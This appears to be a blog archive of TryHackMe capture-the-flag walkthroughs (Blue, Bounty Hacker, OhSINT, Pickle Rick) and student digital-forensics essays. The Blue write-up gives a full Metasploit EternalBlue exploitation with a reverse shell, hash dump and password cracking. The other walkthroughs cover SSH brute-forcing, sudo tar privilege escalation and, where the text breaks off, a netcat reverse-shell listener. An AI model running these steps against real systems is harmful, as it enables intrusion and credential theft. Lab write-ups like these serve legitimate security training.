Month: November 2021

Blue

Blue

Armand Alvarez | Friday, 05 November 2021

Since I use tmux, and I use multiple sessions, I set the tmux env variable $IP to the IP address givent to me by THM.

 └─$ tmux setenv IP 10.10.91.32

Nmap

# Nmap 7.91 scan initiated Fri Nov  5 22:39:26 2021 as: nmap -sCV -v -oN initial 10.10.91.32
Increasing send delay for 10.10.91.32 from 0 to 5 due to 255 out of 848 dropped probes since last increase.
Nmap scan report for 10.10.91.32
Host is up (0.11s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-11-06T02:40:39+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-05T02:12:25
| Not valid after:  2022-05-07T02:12:25
| MD5:   860d 0816 ffbb 1bde 790e f320 9a87 3abb
|_SHA-1: b33b 9c4e b514 c812 32b1 324c 397d 10e6 6c9b 3ad8
|_ssl-date: 2021-11-06T02:40:44+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02:fd:9f:77:75:ad (unknown)
| Names:
|   JON-PC<00>           Flags: 
|   WORKGROUP<00>        Flags: 
|   JON-PC<20>           Flags: 
|   WORKGROUP<1e>        Flags: 
|   WORKGROUP<1d>        Flags: 
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: 
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T21:40:38-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-06T02:40:38
|_  start_date: 2021-11-06T02:12:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  5 22:40:43 2021 -- 1 IP address (1 host up) scanned in 77.09 seconds

We can see from this that the machine has SMB running - with the OS: Windows 7 Service Pack 1. The SMBv1 server in this OS is vulnerable to Eternal Blue, or CVE-2017-0144 CVE link. This vulnerability was published in MS security bulletin ms17-010 MS Bulletin

Metasploit

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Launch Metasploit on linux with `msfconsole`. You can search for either the ms # (ms17-010) or the CVE # (2017-0144) and find similar results.
We can see the exploit path is exploit/windows/smb/ms17_010_eternalblue

Options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.240    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

The options show us a few required options. The only one not set is RHOSTS - which is the target host (see description.) 

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.91.32
rhosts => 10.10.91.32

Set the payload to a reversetcp shell

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Make sure if you are running openvpn (THM usually requires it) you set the LHOST (local host option) to your tun0 ip. You can find this by running `ifconfig`

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.6.77.21
LHOST => 10.6.77.21

It took me letting the exploit run a few times but I finally got in.

Upgrading from normal shell to meterpreter shell

I am using this writeup to convert the shell.

First, background the current (Normal Shell) session. 

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Select the shell_to_meterpreter module

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) >

Our options show that we must add the SESSION. 

msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Set our session to 1 and run.

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.32)
  2         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.32)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1

Now that it has created a new meterpreter session, we can open it

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.3
                                                                   2)
  2         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.3
                                                                   2)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.6.77.21:4433 -> 10.10.91.32:49246 (10.10.91.3
                                                                   2)

msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >

Meterpreter

After I got the ugpraded shell, I ran the command `shell` to open a dos shell then `whoami` to verify I was indeet NT AUTHORITY\SYSTEM. Then I ran the `ps` command to list all running processes, and `migrate` to a process running at NT AUTHORITY\SYSTEM

Cracking the password

Dump all the hashes of the users on this machine. You can do this because you are on an elevated shell.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

I copied this hash into a file and used hashcat to crack it. This article shows how to do that.

└─$ hashcat -m 1000 --show hash /usr/share/wordlists/rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Finding the Flags

The first flag can be found at the root of the machine.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2018-12-12 22:13:22 -0500  Recovery
40777/rwxrwxrwx   4096   dir   2018-12-12 18:01:17 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 23:20:08 -0400  Windows
100666/rw-rw-rw-  24     fil   2018-12-12 22:47:39 -0500  flag1.txt
0000/---------    0      fif   1969-12-31 19:00:00 -0500  hiberfil.sys
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter >

The second flag is in the C:\Windows\System32\config location. This is where passwords are stored.

I was having trouble finding the final flag. But I realized on meterpreter you can do search -f flag* to search for any files that begin with "flag". This showed me the location of the final flag. It is in Jon's documents.

That's all! Happy hacking 🙂

Bounty Hacker

Bounty Hacker

TO SEE THE FULL WRITE-UP WITH IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 16 August 2021

github.com/Armand-Alvarez

Room Link on TryHackMe

Find open ports on the machine

nmap

We can see we have the following ports open:

  • 21 - ftp

  • 22 - ssh

  • 80 - http

Who wrote the task list?

FTP

We can see from our nmap scan that ftp allows anonymous login so lets explore that first.

ftp

After logging in, we begin in the root directory with nothing but two files. We can download these to our local machine using the wget command.

task.txt

Reading the file on our local machine shows that lin wrote it.

What service can you bruteforce with the text file found?

The other file we found is called locks.txt:

locks.txt

It looks like a file of possible passwords. We can try using this later.

Lets check out the website.

website homepage

The homepage has nothing important in it, and the page source doesn't contain anything hidden either.

Gobuster revealed a /images directory that only stores the picture we see on the home page. Nothing important there.

Nikto revealed a few things, but nothing relevant right now:

nikto

Given that the website has lead to a dead end right now, the only other service that we can use the password file on is SSH.

What is the users password?

Hint: Hydra may be able to help.

Lets use Hydra to try to figure out which password works with SSH. We can guess that lin is the username for SSH, figuring that is the only name we have gotten so far.

hydra

We see our successful password is RedDr4gonSynd1cat3.

Testing it on SSH works.

ssh_lin

user.txt

Once we get into the IP via SSH, we can cat the file.

user.txt

The flag for the user is: THM{CR1M3_SyNd1C4T3}

root.txt

Running sudo -l as lin gives us the following:

sudo -l

We can see that lin may run /bin/tar as root. This is great!

Getting on gtfobins, we can search for "tar" and click SUDO (because we have sudo privilages for tar), and are given the following command:

tar sudo

Once we run this command on the SSH terminal, we gain root privilages. We can then read root.txt to find the flag: THM{80UN7Y_h4cK3r}

root

Thats all! Happy hacking.

🙂

Live Analysis

This essay was written for Professor Leinecker's Digital Forensics I course.

Live analysis, or a live response, is when you observe the volatile memory of a system. This kind of memory can be RAM or cache memory, for example. A problem with live analysis is volatility. Much of this information is what is called “volatile”, meaning it will be deleted or altered if the device loses power. So why do live analysis then? Sometimes it is the only option. If you have a warrant that limits you to live response, or if you need to capture that volatile memory to observe internet activity, for example, this would restrict you to only performing a live response. Of course, if you already have (or have seized) a device, you can pull a full image from it and do analysis, but you won’t be able to view much of this volatile memory because it will be gone if the device is powered off. Imaging a hard drive is great for analysis, but it won’t contain any of the vital volatile memory that may be needed to gain evidence for a conviction of wrongdoing. 

What kind of information might be found before a computer is shut down? Well, this can be anything from user data, to applications or programs. Basically, it is the temporary memory of a computer. Web cache and browsing information might be stored in volatile memory too, revealing somebody’s web activity. Cookies are an example of web-based volatile memory. They are stored in the web browser for (typically) as long as the browser remains open. However, once the browser is closed, the cookies are then lost. Sometimes, programs or applications will store passwords or their hashes in memory. If you can pull the strings from RAM memory, you may be able to crack the hashes and gain the cleartext passwords. 

The risks to doing live response can be great, depending on the system, time you have to do it, and tools you use. If you are performing live analysis on a production server, for example, you have to be very careful not to crash the system. Some tools might use too much power or might not work well with the configuration of the server, and cause a hard-crash. This is bad, because crashing a production system may give the company leverage to hold you liable for losses incurred during the outage; for a big company these losses may be great. Some tools also don’t actually perform pure live analysis, meaning they may alter parts of memory in the process of collection. This in turn would make any evidence gathered moot, because altered evidence has no integrity and is oftentimes not admissible in court, or sometimes even in private investigations. Another consideration is data availability and integrity prior to collection. Some people may set up traps that will automatically shut down the computer if it detects live analysis being done on it. Also, most people have encrypted hard drives and keep their computer closed at all times when not on it. They do this because the non-volatile memory is encrypted, and as long as they have their computer, they can shut it down when not using it. 

Wireshark is an example of a live analysis tool. It can be set up on a machine to capture network traffic between that machine and other endpoints.  Magen RAM capture is a tool that does what it’s name implies: it captures volatile RAM memory. RAM Capturer does the same. 

Data Hiding

This essay was originally written 25 Sept 2021 for Professor Leinecker's Digital Forensics I course.

Data hiding, or steganography, is the practice of hiding data within other data. The data that is hidden is called the payload. This can be text, images, videos, any data. The data that it is hidden in is called the carrier. Again, this can be any type of data. Oftentimes, data is hidden within slack space or free space. It can also be hidden by replacing carrier data values with payload data values.

Data hiding has been practiced for centuries. A long time ago, data hiding would be done with invisible ink, or using wax to cover stones with engravings in them that read out a secret message. In the present age, data hiding is done electronically. You can deconstruct any file you want to hide into bits, shove those bits somewhere they won’t be seen, and then reconstruct the file at a later time. This technique is so incredible because it is invisible to the human eye. Looking at an image file or listening to an audio file that has data hidden in it will usually not be detectable unless forensically analyzed. 

To find a file hidden inside another file, you should begin by looking for the file signature, or header. This is a string of hex values that every file of that file-type begins with. For a JPEG, it is  FF D8 FF. Every JPEG image of the JFIF format will begin with these 6 hex values. Make those values the start of your block, and have it end at the file trailer (the last bits in every file of that type.) Extract those bits to their own file and you now have the original file that was hidden. 

To find text in a hidden file can be more difficult because of encryption. If you were to hide human-readable text inside a file, you could easily find it by extracting strings of consecutive human-readable characters from the file. This is because most of the ASCII characters in a file are not human-readable (meaning not in the English alphabet.) For example you may have a string of text that reads: “ÀYŒ€c¸+k·£‘»zzŠñït”. However if you have a string of consecutive characters that read: “This is a code”, you can assume that it was inserted in there on purpose. If the text inserted into a file are encrypted into a format that combines readable and non-readable characters, it would be very difficult to distinguish these from the original file’s data. 

One example of the former is hiding data within image color values. An image has data in the form bytes defining its RGB values. The least significant bit often makes no noticeable difference in the color or quality of an image. This is because it affects less than half of a percent of a pixel’s value. The human eye struggles with perceiving differences that small. To perform the data hiding, you would look at two bit streams: one being the bits of data you wish to hide, called the payload bits, the other being the least significant bits for the RGB values in an image, called the carrier bits. You simply replace the carrier bits with the payload bits. After this is done, the image should look no different to the human eye, but you have hidden your data within the image. To view your data, you would go through the least significant RGB value bits, extract it and concatenate it with the next one. After you have finished, your payload bit stream will be exactly the same as before. The only problem with this method is, if you wanted to return the carrier image used to hide the data to its original, unchanged form, you couldn’t unless you saved those RGB values that were replaced. 

Another method of data hiding is using slack space. Slack space exists when only a portion of a cluster is used. This space is simply unused space and you can add whatever data to it you wish, making it the perfect carrier for payloads. The only caveat is that if that space gets overwritten (through use of the file system,) you may lose your payload bits. This method then clearly works best with unused medium (archive file systems, backup file systems, etc.) 

OhSINT

OhSINT

TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 17 July 2021

Room link

Github Link

Task 1: OhSINT

First download the task file.

Inspecting the base image

Using the eog <image.png> command to view the image we just downloaded, all we see is the old WindowsXP background image.

original image

On its own, this is nothing important, but what if we could dig deeper into the image.

What is this users avatar of?

The very first question asks us what this users avatar is of. Looking at the original photo we downloaded, I have no idea. Lets use a tool called Exiftool to look at some metadata.

According to the man file "Exiftool is a command-line interface..., used for reading and writing meta information in a variety of file types." In other words, it is a steganography analysis tool.

Using this tool, we can see metadata of the image, and find who holds the copywrite.

exiftool

Searching for OSINT

We see an OWoodflint as the copyright holder for the image we downloaded. Lets look this up on google.

The first result is this twitter account.

twitter home

The first question asks what the user's avatar is, putting in cat is the correct answer.

What city is this person in?

The twitter account has two posts, one of which says:
From my house I can get free wifi ;D Bssid: B4:5D:50:AA:86:41 - Go nuts!

The term BSSID is one used to describe a section of a wireless network (WLAN) - it stands for Basic Service Set Identifier. Basically the MAC address of the access point. It is a way of identifying access points and their associated clients. You can get more information here

This can be used to find the location of the WLAN. A website called wigle.net "consolidates location and information of wireless networks world-wide to a central database."

wigle

We can put the BSSID in wigle and find a location in London.

Whats the SSID of the WAP he connected to?

By creating an account, we can search up the BSSID and find the SSID of the WAP. We see the result shown is UnileverWiFi

wapSSID

What is his personal email address?

So, we basically got all we could out of the BSSID, lets look for another method of finding this person's email address.

Our best tool is actaully google. We still have that username, owoodflint. Doing a simple google search of this also shows up the github. This has his email.

github

What site did you find his email address on?

We found it on github! See the previous question above.

Where has he gone on holiday?

There isn't much else on his github, we may return there later, but for now lets examine what other accounts we can find using google.

OH! We see a wordpress blog.

wordpress

It says they are in New York right now, but we know that they live in London. So this must be where they are on vacation.

What is this persons password?

This was a tough one, admittedly. I kept google dorking this dude's name in different ways, and was having trouble finding anything useful. (BTW I will give a big google dork hint to help you get less garbage in your google searches during a CTF at the end of this page)

Anyway, I looked back at the original google search of owoodflint and found something that stuck out to me. Take a look and see if you can spot it too.

googlesearch

Did you see it? Look at the description of the first result. What is that word, "pennYDr0pper"? I don't remember seeing anything that ludicrious on the page! Lets take a closer look on the blog.

blog

Its not on the page, that we can see. But the word came right after the word "photos!" in the google search result description.

Lets try highlighting all the text with ctrl + A

highlighted text

There it is! It looks to be the same format as our text input should be on the TryHackMe page, and it works as our password.

Also, for you dorks out there inspecting the source, you can find it there too.

source

And thats all! But wait...

If you looked closely at my search before, you may have seen it look a little weird:

search

This is an example of whats called a google dork Google dorking, or google hacking, is a technique for finding open-source intelligence on Google. You can modify your google search to become more or less restrictive through google dorking.

For example, in the picture I put -tryhackme. This is because a lot of the search results I would get when searching the phrase oliver woodflint or owoodflint would bring up writeups for the TryHackMe challenge that I was in the middle of doing. This is annoying to sift through, and can waste time figuring out what result is a writeup and what result is legitimate.

So, when you put a - sign directly in front of a phrase in a google search, it tells google to hide any results with that phrase. So my -tryhackme took all the results that had the word tryhackme in it and threw them in the trash. You can also put stuff like -osint, -OhSINT (the name of the challenge), -writeup in the google search to really get rid of all the writeups and keep it only to the content that the CTF author intended to show up (plus maybe one or two legitimate people or businesses named Oliver Woodflint)

Have fun, and good luck on your OSINT adventures!

🙂

Anti-Forensics: 3 tools

This essay was originally written 03 Oct 2021 for Professor Leinecker's Digital Forensics I course.

  1. xxUSBSentinel  (https://github.com/thereisnotime/xxUSBSentinel)

You can download the executable from github.com for this tool. It’s goal is to “make recovering your encryption drive keys almost impossible.” I had trouble understanding this tool at first so I did more research. When a computer is shut down, there is a chance that a key storage utility will lose the encryption key for an encrypted drive, requiring the user input it again [1]. Knowing this information, the tool’s purpose is a quick key-loss implementation. You launch the program, plug and un-plug your USB stick, and then next time you put your USB stick in, you can arm the device to listen for the disconnect message - after which it will shut down your computer.

Let’s say you have an encrypted USB stick on your computer. You want the key for this drive to be forgotten should investigators look at your computer. This utility makes it so that when the user pulls their USB stick from the computer, the encryption key is forgotten and must be entered again upon the next use of the drive. An investigator can get around this via social engineering, by accessing the computer while the USB stick is still inserted.

  1. Metadata-Remover  (https://github.com/Anish-M-code/Metadata-Remover)

This tool is simple - it removes identifiable metadata from images and videos. The use of this tool is to protect your anonymity when posting media. This is a CLI tool written in C and Python3. To use it you can just download the latest release, install to a directory, and run the exe. This launches a command line. Drag your image to the “images” folder in the tool directory, then you put the name of the image. This scrubs it.

The importance of this tool is to protect your anonymity. People can use image and video metadata to identify your location and other personally identifiable information. A forensic investigator can thwart these efforts by gaining access to the original file. The unfortunate part with this method, is that it is supposed to be used when uploading files online, so an investigator would need access to the host machine and there may be a copy of the original. 

  1. ForensicsF***er (https://github.com/NoahGWood/FileChanger)

This tool modifies timestamps after a pre-determined length of time passes. Basically, a user can run this program and modify the file times in EXT-4 filesystem (Linux only.) The tool also has a really cool feature called self-destruct mode that will delete the python script after use. This tool is more of a proof-of-concept than an actually usable tool (only works on Linux, uses pre-determined files.) But the POC could be used in a more user-friendly tool.

The real-world use of this tool is to remove data integrity. If you have evidence, and all the timestamps are from a date after the investigation started, this could ruin the integrity of the investigation (at least from an outside perspective) and force evidence to be thrown out. A forensic investigator could prevent this by removing the program before it goes off, or by imaging the file system multiple times and only working on those that have not been modified by the program. 

Sources:

[1] Afonin, O. (2021, September 23). Forensic implications of sleep, hybrid sleep, hibernation, and fast startup in Windows 10. ElcomSoft blog. Retrieved October 3, 2021, from https://blog.elcomsoft.com/2021/09/forensic-implications-of-sleep-hybrid-sleep-hibernation-and-fast-startup-in-windows-10/. 

Getting Started with WinHex

This post was originally written 27 August 2021 for Professor Leinecker's Digital Forensics I course.

This paper will discuss my experience with WinHex. I do not own the product yet, however I have read up on the software and watched videos of it in action. To begin, it seems when you open a file or examine a drive, you can view the raw hex of it. I am not too sure when this would come in handy, but my guess would be in defeating steganography efforts. What seems really cool however, is the ability to edit the hex values. This would allow you to change the contents of a file at such a low level, that you may be able to obfuscate the original data or alter it in a non-human-readable way, however this is just speculation.

I am curious about how the software is able to recover deleted data. I do not know enough yet to make much more than an educated guess on how the process works, but I would image it may look at recently modified sections of memory and somehow reverse engineer what the memory was to its original state (maybe factoring in the time since modification, or performing an inverse function of some sort, i.e. if deleted data puts the bits through a deletion algorithm: put them through the inverse of said algorithm.) 

I would like to see if the software can be used in Capture The Flag challenges. This is a hobby of mine, and if WinHex could assist in file-recovery focused CTF challenges, or steganography-focused ones, then it would give me a leg-up on the competition. Again, not knowing much about the software makes it difficult to speculate, but I would imagine that WinHex will eventually be either put in a suite of tools that all come pre-baked into a Digital Forensics suite, or it will eventually be replaced by an open-source free version. 

WinHex – Feature Overview

This paper was originally written 10 Sept 2021, for Professor Leinecker's Digital Forensics I class.

This paper will provide a rough overview of several features that WinHex, a digital forensics tool, offers. To begin, WinHex can be used to view the hex and ASCII contents of a file or file system, recover a file, look at recently deleted files on a file system, alter a file at the hex or ASCII level, and much more. It contains a plethora of tools, all designed to be used in digital forensics investigations. 

One such tool is the Compute Hash tool. This can be accessed through the Tools menu. It can take a file and compute any sort of hash based on the contents of the file. The most commonly used hashes are MD5 and SHA-1, however there are many others, such as SHA-256 and RipeMD-128. In a digital forensics investigation, and elsewhere, hashes are used as a form of integrity check. A hash value is, in theory, a unique value assigned to a file, based on its contents. The data in a file is put through an algorithm, such as those listed earlier, and the value that is spit out will change if any of the data in the file is modified. This allows a reader to be confident that the data in a file has not been altered so long as the hash value is the same as it was earlier. 

Another tool in WinHex is the HexConverter. This, too, is accessed through the Tools menu. It takes either hexadecimal or decimal numbers, and converts it to the other. For example, if one puts A203 in the hexadecimal portion, 41475 will be given back to them, which is the decimal equivalent. This is very useful for making measurements more understandable. If you were to present hexadecimal values to a jury, they may become confused or frustrated, as very few lay people understand hex enough to relate it to their own experiences. Using this tool to convert hex to decimal will allow juries to better understand evidence being shown, and come to a more rational and well-thought out conclusion, without changing the underlying truth behind the evidence or data.

One last tool to discuss is the Clone Disk tool. This can be accessed through Tools -> Disk Tools -> Clone Disk. This tool allows you to make an exact copy of a disk to another device. This is very useful to investigators, as you never want to do analysis on an original piece of evidence, or else risk accidentally or intentionally modifying that evidence. Misuse of original evidence could mean the evidence being thrown out, or the entire case being declared a mistrial. 

This tool has several options you can adjust. You can choose to copy the entire medium, meaning the whole disk is copied over, or you can copy specific sectors of the source. You can label any sector that can’t be read, which would make identifying damaged or corrupted sectors a lot easier. You can also skip damaged areas altogether, the benefit of such being a decrease in disk occupation.

One option is to copy sectors in reverse order. I did some digging and can’t seem to find out why this would be done, and I suspect it may change the hash value from the original, but I haven’t tested it. My one hypothesis is that copying the sectors backwards might reveal some sort of steganography technique. When selecting the option, it gives you a prompt asking if you are confident you want to copy backwards, which tells me that it probably isn’t used very often unless under specific circumstances. 

Pickle Rick

Pickle Rick

TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 31 July 2021

Room Link

Github Link

Task 1: Pickle Rick

With this box, we are given nothing but an IP address, and 3 questions, each asking the name of 1 ingredient that Rick needs. So lets begin.

The First Ingredient

Lets start poking at this IP address we have, see what comes up.

Running the nmap command: nmap -sC -sV -O -oN nmap.txt <IP> gives us the following

nmap

Lets break this nmap command down:

  • nmap - Tells linux to run an nmap scan
  • -sC - Runs default scripts
  • -sV - Probes open ports to determine service/version info
  • -O - Enables OS detection
  • -oN nmap.txt - Outputs the scan in the normal format to the file nmap.txt
  • 10.10.55.186 - The IP address of our box

The output tells us that there are two services running: SSH and HTTP.

Since we know there is a web service, I will start up gobuster, a tool for enumerating the directories of a website. I will go over the details later, but while that is running in the background, lets take a look at the website.

website home

There isn't much to it. A picture and some unassuming text. Taking a look at the page source (on firefox, right-click, then select View Page Source) we can find a username: R1ckRul3s.

website home viewing source

Nice! Our first half of a set of credentials (still need the password.) Make sure you write this down for later.

Lets see if there is a robots.txt page. Oh, I should probably explain what that is. Google's developers documentation says that a robots.txt page "tells search engine crawlers which URLs the crawler can access on your site. It is used mainly to avoid overloading your site with requests." Cool! So basically, instead of a robot on the internet having to check every single page your website has to see if it can access it, it can look at the robots.txt page to see where it is allowed to go, saving your website the overhead.

If we navigate to /robots.txt on our web browser, all we get is the text: Wubbalubbadubdub

Not too interesting, but, like any text that stands out, you should write it down and see if it does anything interesting later.

Lets go back to our gobuster results.

gobuster

2 results, /assets and /server-status, both of which aren't very interesting. I will let you explore them as you wish.

For now, I will explain what gobuster is, the input, and how to interpret the output. Gobuster is a tool that enumerates directories on a web server. Basically, when you are given an IP address, if you type it into the address bar on the top of a web browser, it takes you to that website's home page. There are often times other pages within that web server address, that can be found by putting a / character after the IP address (1.2.3.4/robots.txt or 14.32.122.34/assets.)

gobuster dir -u http://10.10.74.255 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

Lets break down this command:

  • gobuster - the command to run the gobuster program
  • dir - Run in directory mode, because we are enumerating web server directories
  • -u http://10.10.74.255 - Gives the url to gobuster
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - Gives the wordlist to run against the url. If you have kali linux, the /usr/share/wordlists directory is an amazing directory that contains a whole bunch of wordlists to use for many different things. The dirbuster/directory-list-2.3-medium.txt is a good one to use for gobuster directory enumeration.
  • | - Pipes the output into the following command
  • tee - This command takes the output and both shows it on the terminal screen (which is called standard output) and saves the output to a file of your choice
  • gobuster.txt - The name of the file to save the gobuster results to

On the bottom of the gobuster output, you see /assets and /server-status which are the directories the program found.

I also ran nikto on the IP address to look for any known vulnerabilities. The output revealed something interesting...

nikto

An Admin login page called /login.php. Lets explore this.

login

Nice!! A login page. We know from earlier that a valid username should be R1ckRul3s. The only other information we have gathered so far was that random Wubbalubbadubdub from the robots.txt page. Lets try that out.

command panel

Awesome, it brought us to a new page, Command Panel. Given this is a command panel, if we try the command ls, it outputs a list of files.

trying ls command in command panel

Here, we see one file in particular, Sup3rS3cretPickl3Ingred.txt. Trying the cat command to read it doesn't work, the command has been disabled. Trying head also doesn't work, but less works!

less ingredientfile command panel

Our first ingredient is mr. meeseek hair

The Second Ingredient

Since this is a command panel, and it clearly runs linux commands, lets see if we can run a reverse shell script on it.

First, open a new tab on your terminal and run the command:

nc -lvnp 1234

This tells netcat to:

  • -l - listen for inbound connects
  • v - verbose
  • n - numeric-only IP addresses, no DNS
  • p - specify the port to listen on

So now netcat is listening on port 1234 for connections coming into it. The connection would have to come into our openvpn IP address.

nc listening

We can find our openvpn IP address with the command: ip a s

ip

The ip address we want to use for our reverse shell is tun0 (in my case, 10.6.77.21)

